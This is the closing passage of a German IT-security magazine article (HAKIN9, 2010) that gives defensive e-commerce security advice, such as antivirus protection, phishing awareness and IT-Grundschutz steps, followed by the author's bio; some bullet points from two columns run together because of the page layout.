• Das Schloßsymbol in der Browserstatusleiste signalisiert eine sichere Verbindung; Thema IT-Grundschutz herangehen,
• Hinweis auf einen Anti-Virus-Schutz auf dem Kundenrechner. Auch er selbst muss aktiv • Sicherheitsanalysen vornehmen,
etwas für die Sicherheit unternehmen;
Notwendigkeiten von Maßnahmen
• Banken, e-Shop Betreiber und andere Internetvertriebspartner fragen niemals Passwörter
erläutern,
oder andere Zugangsdaten per E-Mail ab.
• Sicherheitsziele definieren und Rege-
lungen festlegen,

114 HAKIN9 extra 1/2010


• IT-Sicherheit auf Schutzmechanismen
aufbauen,
• Durchsetzung der IT-Sicherheit und
permanente Kontrolle.

Abschließend bleibt uns als Fazit der Aus-


blick in die Zukunft und die Empfehlung
mehr für die eigene Sicherheit zu tun und
für Kunden Sicherheitsempfehlungen aus-
zusprechen.
Nicht nur Sicherheitsberater stehen
Ihnen dabei zur Verfügung sondern ei-
ne ganze Industrie die sich täglich den
Hackern, Neppern und Angreifern gegen
über sieht. In der Zukunft werden wir uns
immer ausgefeilteren Angriffsmethoden
gegenüber sehen die dann immer mehr
Opfer unter Dienstleistern und Kunden
finden werden.
Das Vertrauen von Kunden in e-
Commerce könnte dadurch enorm
geschmählert werden und die wirt-
schaftliche Basis von Dienstanbietern im
Internet könnte zerstört werden. Hierbei
ist ein Imageverlust eines Unternehmens
im e-Commerce vorprogrammiert und
ist schwer wieder herstellbar. Allein nur
sich um die eigene Sicherheit zu sorgen
reicht in der heutigen Zeit lange nicht
mehr aus und so müssen Sicherheits-
experten, Anwender und Hersteller mehr
gemeinschaftlich agieren.
Firewalls müssen mit besseren Fea-
tures ausgestattet werden, Anti-Virus
Software bekommt immer mehr die Be-
deutung mehr als nur Viren zu erkennen
und Sicherheitsexperten müssen sich
auf kommende Gefahren einstellen um
Strategien zur Abwehr entwickeln zu kön-
nen.

Marko Rogge
Der Autor ist freier Journalist und hat bereits
diverse Publikationen für Printmedien abgeliefert.
Tätigkeitsschwerpunkte der Unternehmensberatung
sind die Bereiche IT-Grundschutz und IT-Security in
Unternehmen sowie die aktive Unterstützung bei der
Einführung von Unternehmensdatenschutz. Hierfür
stehen fachlich kompetente Partner zur Seite. Als
Moderator und Referent beteiligt sich Marko Rogge
aktiv an der effektiven Informationsverbreitung zur
Verbesserung von IT-Grundschutz und Zertifizierungen
in Unternehmen. Darüber hinaus engagiert er sich
in freien Projekten, die sich gegen die Internetzensur
richten.